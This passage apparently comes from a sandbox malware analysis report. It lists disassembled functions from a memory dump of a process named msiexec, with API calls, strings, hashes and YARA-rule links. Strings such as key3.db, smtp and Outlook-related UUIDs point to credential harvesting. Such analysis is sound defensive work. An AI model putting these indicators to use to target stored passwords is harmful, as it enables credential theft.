                                                                    • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                    • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                    • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                    Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 004090C2
                                                                    • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                    • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                    • String ID:
                                                                    • API String ID: 4247780290-0
                                                                    • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                    • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                    • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                    • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                    Function 0040B994 Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                      • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                      • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                    • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                      • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                      • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                      • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                      • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                    • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                                                    • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                                                    • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                    • String ID:
                                                                    • API String ID: 2374668499-0
                                                                    • Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                    • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                    • Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                    • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                    Function 00409A32 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                    • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                                                    • Opcode Fuzzy Hash: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                    • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                                                    Function 00409A98 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                                    • free.MSVCRT ref: 00409B00
                                                                      • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$free
                                                                    • String ID:
                                                                    • API String ID: 2241099983-0
                                                                    • Opcode ID: 31fdcc5134ad351e7c18f58886b056bef117553105c5edd8e205bd7bfa1d52a3
                                                                    • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                                                    • Opcode Fuzzy Hash: 31fdcc5134ad351e7c18f58886b056bef117553105c5edd8e205bd7bfa1d52a3
                                                                    • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                                                    Function 00410777 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                      • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                      • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                    • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                    • GetSysColor.USER32(00000005), ref: 004107A6
                                                                    • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                    • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                    • String ID:
                                                                    • API String ID: 2775283111-0
                                                                    • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                    • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                    • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                    • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                    Function 0041479C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                    • API String ID: 885266447-2471937615
                                                                    • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                    • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                    • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                    • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                    Function 00406AC7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                    • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                                                      • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                      • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407917
                                                                      • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: File$??2@??3@CloseHandleReadSize
                                                                    • String ID: Ul@$key3.db
                                                                    • API String ID: 3013762397-1563549157
                                                                    • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                    • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                                                    • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                    • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                                                    Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _strcmpi.MSVCRT ref: 0040E134
                                                                    • _strcmpi.MSVCRT ref: 0040E14D
                                                                    • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _strcmpi$_mbscpy
                                                                    • String ID: smtp
                                                                    • API String ID: 2625860049-60245459
                                                                    • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                    • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                    • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                    • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                    Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040C28C
                                                                    • SetFocus.USER32(?,?), ref: 0040C314
                                                                      • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FocusMessagePostmemset
                                                                    • String ID: S_@$l
                                                                    • API String ID: 3436799508-4018740455
                                                                    • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                    • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                    • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                    • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                    Function 0040929C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004092C0
                                                                    • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                    • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                    Strings
                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileString_mbscpymemset
                                                                    • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                    • API String ID: 408644273-3424043681
                                                                    • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                    • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                    • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                    • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                    Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _mbscpy
                                                                    • String ID: C^@$X$ini
                                                                    • API String ID: 714388716-917056472
                                                                    • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                    • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                    • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                    • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                    Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                    • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                    • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                    • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                    • String ID: MS Sans Serif
                                                                    • API String ID: 3492281209-168460110
                                                                    • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                    • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                    • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                    • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                    Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName_strcmpimemset
                                                                    • String ID: edit
                                                                    • API String ID: 275601554-2167791130
                                                                    • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                    • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                    • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                    • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                    Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$_mbscat
                                                                    • String ID: 3CD
                                                                    • API String ID: 3951308622-1938365332
                                                                    • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                    • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                    • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                    • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                    Function 004326AD Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 475COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: rows deleted
                                                                    • API String ID: 2221118986-571615504
                                                                    • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                    • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                    • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                    • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                    Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$memset
                                                                    • String ID:
                                                                    • API String ID: 1860491036-0
                                                                    • Opcode ID: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                    • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                    • Opcode Fuzzy Hash: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                    • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                    Function 00404888 Relevance: 6.3, APIs: 5, Instructions: 77COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004048C2
                                                                    • memset.MSVCRT ref: 004048D6
                                                                    • memset.MSVCRT ref: 004048EA
                                                                    • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                    • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$memcpy
                                                                    • String ID:
                                                                    • API String ID: 368790112-0
                                                                    • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                    • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                    • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                    • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                    Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040D2C2
                                                                    • memset.MSVCRT ref: 0040D2D8
                                                                    • memset.MSVCRT ref: 0040D2EA
                                                                    • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                    • memset.MSVCRT ref: 0040D319
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$memcpy
                                                                    • String ID:
                                                                    • API String ID: 368790112-0
                                                                    • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                    • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                    • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                    • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                    Function 004257AA Relevance: 6.2, APIs: 4, Instructions: 181COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __allrem.LIBCMT ref: 00425850
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                    • __allrem.LIBCMT ref: 00425933
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                    • String ID:
                                                                    • API String ID: 1992179935-0
                                                                    • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                    • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                    • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                    • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                    Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                    • too many SQL variables, xrefs: 0042C6FD
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                    • API String ID: 2221118986-515162456
                                                                    • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                    • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                    • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                    • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                    Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                    • memset.MSVCRT ref: 004026AD
                                                                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
